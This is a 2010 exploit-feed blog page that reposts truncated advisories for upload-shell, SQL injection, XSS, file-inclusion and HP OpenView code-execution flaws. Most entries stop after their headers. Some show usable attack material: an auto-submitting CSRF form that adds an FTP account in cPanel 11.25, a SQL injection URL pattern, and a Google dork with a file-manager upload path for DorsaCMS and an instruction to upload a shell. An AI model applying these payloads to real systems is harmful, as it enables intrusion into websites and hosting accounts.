Information Security News and Exploits

Providing you with Security News and Exploits from all over the web.

Entries for July 3rd, 2010

MyImages Image file manager => upload shell

Jul.03, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>MyImages Image file manager =&gt; upload shell</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>===========================================
MyImages Image file manager =&gt; upload shell
===========================================
##########################################
#[+] Date: 02/07/2010
#[+] Author: MeGo
#[+] Tested ON :windows xP
#[+] MY Team : Team Hacker Egypt
#[+] CategorY : Webapps/0day TYPE: PHP
#[+] Email: M3GO@live.com
##########################################
[ [...]

Leave a Comment

DXL dev Image Hosting => upload shell

Jul.03, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>DXL dev Image Hosting =&gt; upload shell</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=====================================
DXL dev Image Hosting =&gt; upload shell
=====================================
##########################################
#[+] Date: 02/07/2010
#[+] Author: MeGo
#[+] Tested ON :windows xP
#[+] MY Team : Team Hacker Egypt
#[+] CategorY : Webapps/0day TYPE: PHP
#[+] Email: M3GO@live.com
##########################################
[+] [...]

Leave a Comment

Docmint => 2.1 XSS|HTML|URL Injection/Redirecting Vulnerability

Jul.03, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Docmint =&gt; 2.1 XSS|HTML|URL Injection/Redirecting Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>===============================================================
Docmint =&gt; 2.1 XSS|HTML|URL Injection/Redirecting Vulnerability
===============================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ [...]

Leave a Comment

HP OpenView NNM getnnmdata.exe CGI Invalid MaxAge Code Execution

Jul.03, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>HP OpenView NNM getnnmdata.exe CGI Invalid MaxAge Code Execution</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=======================================================================
HP OpenView NNM getnnmdata.exe CGI Invalid MaxAge Remote Code Execution
=======================================================================
# Exploit Title: HP OpenView NNM getnnmdata.exe CGI Invalid MaxAge Remote Code Execution
# Date: 2010.07.02
# Author: S2 Crew [Hungary]
# Software [...]

Leave a Comment

HP OpenView NNM getnnmdata.exe CGI Invalid ICount Code Execution

Jul.03, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>HP OpenView NNM getnnmdata.exe CGI Invalid ICount Code Execution</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=======================================================================
HP OpenView NNM getnnmdata.exe CGI Invalid ICount Remote Code Execution
=======================================================================
# Exploit Title: HP OpenView NNM getnnmdata.exe CGI Invalid ICount Remote Code Execution
# Date: 2010.07.02
# Author: S2 Crew [Hungary]
# Software [...]

Leave a Comment

HP OpenView NNM getnnmdata.exe CGI Invalid Hostname Code Execution

Jul.03, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>HP OpenView NNM getnnmdata.exe CGI Invalid Hostname Code Execution</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>==================================================================
HP OpenView NNM getnnmdata.exe CGI Invalid Hostname Code Execution
==================================================================
# Exploit Title: HP OpenView NNM getnnmdata.exe CGI Invalid Hostname Remote Code Execution
# Date: 2010.07.02
# Author: S2 Crew [Hungary]
# Software Link: [...]

Leave a Comment

Joomla Component com_seyret Local File Inclusion Vulnerability

Jul.03, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Joomla Component com_seyret Local File Inclusion Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>==============================================================
Joomla Component com_seyret Local File Inclusion Vulnerability
==============================================================
# Exploit Title: Joomla Component Seyret (com_seyret)
# Date: 2010-06-26
# Author: _mlk_
# Software Link: null
# Version: null
# Tested on: Linux*,*BSD and *windows
# CVE : null
# [...]

Leave a Comment

Joomla Component com_eventcal Blind SQL Injection Vulnerability

Jul.03, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Joomla Component com_eventcal Blind SQL Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>===============================================================
Joomla Component com_eventcal Blind SQL Injection Vulnerability
===============================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ [...]

Leave a Comment

Specialist Bed and Breakfast Website SQL Injection Exploit

Jul.03, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Specialist Bed and Breakfast Website SQL Injection Exploit</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>==========================================================
Specialist Bed and Breakfast Website SQL Injection Exploit
==========================================================
#!/usr/bin/python
# Specialist Bed and Breakfast Website SQL Injection Exploit
# by Valentin Hoebel (valentin@xenuser.org)
# Version 1.0 (3rd July 2010)
# ASCII FOR BREAKFAST
# About the [...]

Leave a Comment

Xampp 1.7.3 CSRF and Password disclosure Vulnerability

Jul.03, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Xampp 1.7.3 CSRF and Password disclosure Vulnerability </title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>======================================================
Xampp 1.7.3 CSRF and Password disclosure Vulnerability
======================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ [...]

Leave a Comment

SweetRice <= 0.6.4 (fckeditor) Remote File Upload

Jul.03, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>SweetRice &lt;= 0.6.4 (fckeditor) Remote File Upload</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=================================================
SweetRice &lt;= 0.6.4 (fckeditor) Remote File Upload
=================================================
##############################################################################
#Title: SweetRice &lt; 0.6.4 (fckeditor) Remote File Upload [...]

Leave a Comment

Family Connections Who is Chatting Add-On Remote File Inclusion

Jul.03, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Family Connections Who is Chatting Add-On Remote File Inclusion</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>===============================================================
Family Connections Who is Chatting Add-On Remote File Inclusion
===============================================================
# Author : lumut–
# Script Details : http://www.familycms.com/downloads/details.php?file=50
# Bugs [...]

Leave a Comment

Boomer (evento.php) Blind SQL Injection Vulnerability

Jul.03, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Boomer (evento.php) Blind SQL Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=====================================================
Boomer (evento.php) Blind SQL Injection Vulnerability
=====================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ [...]

Leave a Comment

Creso (squadra.php) Blind SQL Injection Vulnerability

Jul.03, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Creso (squadra.php) Blind SQL Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=====================================================
Creso (squadra.php) Blind SQL Injection Vulnerability
=====================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ [...]

Leave a Comment

Eurosito (pages.php) SQL Injection Vulnerability

Jul.03, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Eurosito (pages.php) SQL Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>================================================
Eurosito (pages.php) SQL Injection Vulnerability
================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ [...]

Leave a Comment

Finweb (articolo.php) Blind SQL Injection Vulnerability

Jul.03, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Finweb (articolo.php) Blind SQL Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=======================================================
Finweb (articolo.php) Blind SQL Injection Vulnerability
=======================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ [...]

Leave a Comment

Cpanel v11.25 CSRF Add FTP Account Exploit

Jul.03, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Cpanel v11.25 CSRF Add FTP Account Exploit</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>==========================================
Cpanel v11.25 CSRF Add FTP Account Exploit
==========================================
# Exploit Title: Cpanel 11.25 – [CSRF] Add FTP Account
# Author: G0D-F4Th3r
# Software Link: http://www.cpanel.net/
# Version: 11.25
#######################Exploit#######################################
&lt;html&gt;
&lt;body onload=&quot;javascript:fireForms()&quot;&gt;
&lt;form method=&quot;POST&quot; name=&quot;form0&quot; action=&quot;
http://server:2082/frontend/x3/ftp/doaddftp.html&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;login&quot; value=&quot;name&quot;/&gt;
&lt;input type=&quot;hidden&quot; [...]

Leave a Comment

Joomla Component com_socialads Persistent Xss Vulnerability

Jul.03, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Joomla Component com_socialads Persistent Xss Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>===========================================================
Joomla Component com_socialads Persistent Xss Vulnerability
===========================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ [...]

Leave a Comment

Ziggurat Farsi CMS SQL Injection Vulnerability

Jul.03, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Ziggurat Farsi CMS SQL Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>==============================================
Ziggurat Farsi CMS SQL Injection Vulnerability
==============================================
# Author: Arash Saadatfar
[~]######################################### InformatioN #############################################[~]
[~] Title : Ziggurat Farsi CMS SQL Injection Vulnerability
[~] Author : Arash Saadatfar
[~]######################################### ExploiT #############################################[~]
[~] Vulnerable File :
http://server/main.asp?id=5945&amp;grp=[SQL Injection]
[~]######################################### FinisH [...]

Leave a Comment

DorsaCMS Remote File Upload Vulnerability

Jul.03, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>DorsaCMS Remote File Upload Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=========================================
DorsaCMS Remote File Upload Vulnerability
=========================================
* By : NetQurd
*SPT : d3c0der , HIV Security Team
* Mail : NetQurd@Live.Com , NetQurd@AttackerZ.iR
*Web : Http://AttackerZ.iR
#####################################
*Home : www.dorsagroup.ir
*Dork : &quot;Powered by DorsaCMS&quot;
*Exploit :
http://site.com/FCKEditor/editor/filemanager/connectors/test.html
Use : ASP.Net
Upload Shell Or File
Go [...]

Leave a Comment